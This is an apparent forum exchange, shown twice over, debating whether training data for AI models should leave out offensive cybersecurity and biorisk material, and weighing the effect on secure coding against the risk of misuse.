Excluding cybersecurity information means that the model will write insecure code. To the extent that the model is writing substantial amounts of internet-facing code that is not subsequently reviewed by a security-conscious person, this will result in the deployment of insecure code. In internet-facing contexts, deploying code with certain types of vulnerabilities (e.g. RCE) results in handing free computing resources to botnets.
In the best-case scenario, the model will know what it does not know, and inform users that it cannot write secure code and if they need secure code they should use tools that can support that (such as already-existing LLMs that do have information about writing secure code in their training data), and the users will actually listen to the warnings and not just go “it’ll probably be fine, the warning doesn’t apply to me because I’m in a hurry”. I don’t expect that we’d get a best-case scenario.
An even more extreme approach, of not training the model on code at all, would work for preventing the particular model in question from having dangerous programming-related capabilities and also wouldn’t have issues where the model appears to solve the user’s problem, but in a way which will cause issues to that user and have negative externalities later on down the road.
I expect that there’s a similar thing going on with biological stuff and lab safety guidelines.
I agree that not knowing anything at all about cybersecurity might cause the model to write less secure code (though it is not obvious that the inclusion of unsafe code examples doesn’t in fact lead to more unsafe code being emitted, but let’s put that aside).
However, writing safe code requires quite different knowledge from offensive cybersecurity. For writing safe code, it is relevant to know about common vulnerabilities (which are often just normal bugs) and how to avoid them—information which I agree probably should be kept in the dataset (at least of code completion models, which are not necessarily all models). Most other examples I gave are irrelevant. For instance, exploit mitigations (such as ASLR, CFG, and the rest that I listed in the post) are completely transparent to developers and are implemented by the complier and operating system, and all exploit techniques (such as ROP, …) are completely irrelevant to developers. For another example, knowing about the specific vulnerabilities which were found in the past few years is irrelevant to writing safe code, but does open the gate for one-day exploitation (one might argue that due to sample efficiency, models do need that, but I think it’ll be insignificant; I can elaborate if anyone is interested).
I don’t know enough about biorisks to comment on the situation there. I will be surprised if certain techniques that are particularly relevant for developing deadly pathogens are relevant to a non-negligible fraction of biology research. Of course, there would be some overlap (just as for cybersecurity you have to able to code at all), but I’d argue that a big fraction doesn’t overlap significantly.
For future reference, there are benchmarks for safe code that could be use to assess this issue such as Purple Llama CyberSecEval by Meta.
(Note: This paper has two different tests. First, a benchmark for writing safe code, which I didn’t check and can’t vouch for, but seems like a useful entry point. Second, a test for model alignment towards not cooperating with asks for tools for cyberattacks, which I don’t think is too relevant to the OP.)
I appreciate the concreteness of your proposal.
Excluding cybersecurity information means that the model will write insecure code. To the extent that the model is writing substantial amounts of internet-facing code that is not subsequently reviewed by a security-conscious person, this will result in the deployment of insecure code. In internet-facing contexts, deploying code with certain types of vulnerabilities (e.g. RCE) results in handing free computing resources to botnets.
In the best-case scenario, the model will know what it does not know, and inform users that it cannot write secure code and if they need secure code they should use tools that can support that (such as already-existing LLMs that do have information about writing secure code in their training data), and the users will actually listen to the warnings and not just go “it’ll probably be fine, the warning doesn’t apply to me because I’m in a hurry”. I don’t expect that we’d get a best-case scenario.
An even more extreme approach, of not training the model on code at all, would work for preventing the particular model in question from having dangerous programming-related capabilities and also wouldn’t have issues where the model appears to solve the user’s problem, but in a way which will cause issues to that user and have negative externalities later on down the road.
I expect that there’s a similar thing going on with biological stuff and lab safety guidelines.
Thanks for the feedback! Upvoted, but disagreed.
I agree that not knowing anything at all about cybersecurity might cause the model to write less secure code (though it is not obvious that the inclusion of unsafe code examples doesn’t in fact lead to more unsafe code being emitted, but let’s put that aside).
However, writing safe code requires quite different knowledge from offensive cybersecurity. For writing safe code, it is relevant to know about common vulnerabilities (which are often just normal bugs) and how to avoid them—information which I agree probably should be kept in the dataset (at least of code completion models, which are not necessarily all models). Most other examples I gave are irrelevant. For instance, exploit mitigations (such as ASLR, CFG, and the rest that I listed in the post) are completely transparent to developers and are implemented by the complier and operating system, and all exploit techniques (such as ROP, …) are completely irrelevant to developers. For another example, knowing about the specific vulnerabilities which were found in the past few years is irrelevant to writing safe code, but does open the gate for one-day exploitation (one might argue that due to sample efficiency, models do need that, but I think it’ll be insignificant; I can elaborate if anyone is interested).
I don’t know enough about biorisks to comment on the situation there. I will be surprised if certain techniques that are particularly relevant for developing deadly pathogens are relevant to a non-negligible fraction of biology research. Of course, there would be some overlap (just as for cybersecurity you have to able to code at all), but I’d argue that a big fraction doesn’t overlap significantly.
For future reference, there are benchmarks for safe code that could be use to assess this issue such as Purple Llama CyberSecEval by Meta.
(Note: This paper has two different tests. First, a benchmark for writing safe code, which I didn’t check and can’t vouch for, but seems like a useful entry point. Second, a test for model alignment towards not cooperating with asks for tools for cyberattacks, which I don’t think is too relevant to the OP.)